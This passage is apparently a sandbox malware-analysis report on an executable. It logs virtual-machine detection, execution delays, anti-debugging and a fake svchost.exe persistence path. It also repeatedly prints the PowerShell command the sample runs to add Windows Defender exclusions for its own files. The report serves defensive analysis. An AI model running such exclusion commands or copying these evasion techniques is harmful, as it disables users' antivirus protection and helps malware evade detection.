            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Users\user\Desktop\qINcOlwRud.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Users\user\Desktop\qINcOlwRud.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Tries to delay execution (extensive OutputDebugStringW loop)Show sources
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeSection loaded: OutputDebugStringW count: 230
            Source: C:\Users\user\Desktop\qINcOlwRud.exeSection loaded: OutputDebugStringW count: 115
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1725
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2432
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 625
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 804
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1052
            Source: C:\Users\user\Desktop\qINcOlwRud.exeWindow / User API: threadDelayed 1181
            Source: C:\Users\user\Desktop\qINcOlwRud.exeWindow / User API: threadDelayed 8628
            Source: C:\Users\user\Desktop\qINcOlwRud.exe TID: 5440Thread sleep count: 100 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6664Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -16602069666338586s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep count: 804 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6116Thread sleep count: 57 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1708Thread sleep count: 1052 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Users\user\Desktop\qINcOlwRud.exe TID: 6564Thread sleep time: -20291418481080494s >= -30000s
            Source: C:\Users\user\Desktop\qINcOlwRud.exe TID: 6572Thread sleep count: 1181 > 30
            Source: C:\Users\user\Desktop\qINcOlwRud.exe TID: 6572Thread sleep count: 8628 > 30
            Source: C:\Windows\System32\svchost.exe TID: 5856Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe TID: 5068Thread sleep count: 99 > 30
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe TID: 6100Thread sleep count: 100 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep count: 113 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep count: 52 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6604Thread sleep count: 153 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608Thread sleep count: 92 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1948Thread sleep count: 49 > 30
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Users\user\Desktop\qINcOlwRud.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread delayed: delay time: 922337203685477
            Source: qINcOlwRud.exe, 00000000.00000002.377981680.0000000005430000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: qINcOlwRud.exe, 00000000.00000002.269348936.00000000011EF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
            Source: qINcOlwRud.exe, 00000000.00000002.377981680.0000000005430000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: qINcOlwRud.exe, 00000000.00000002.377981680.0000000005430000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: qINcOlwRud.exe, 00000000.00000002.377981680.0000000005430000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information queried: ProcessInformation

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess queried: DebugPort
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess queried: DebugPort
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess token adjusted: Debug
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess token adjusted: Debug
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\qINcOlwRud.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Adds a directory exclusion to Windows DefenderShow sources
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess created: C:\Users\user\Desktop\qINcOlwRud.exe C:\Users\user\Desktop\qINcOlwRud.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Users\user\Desktop\qINcOlwRud.exe VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
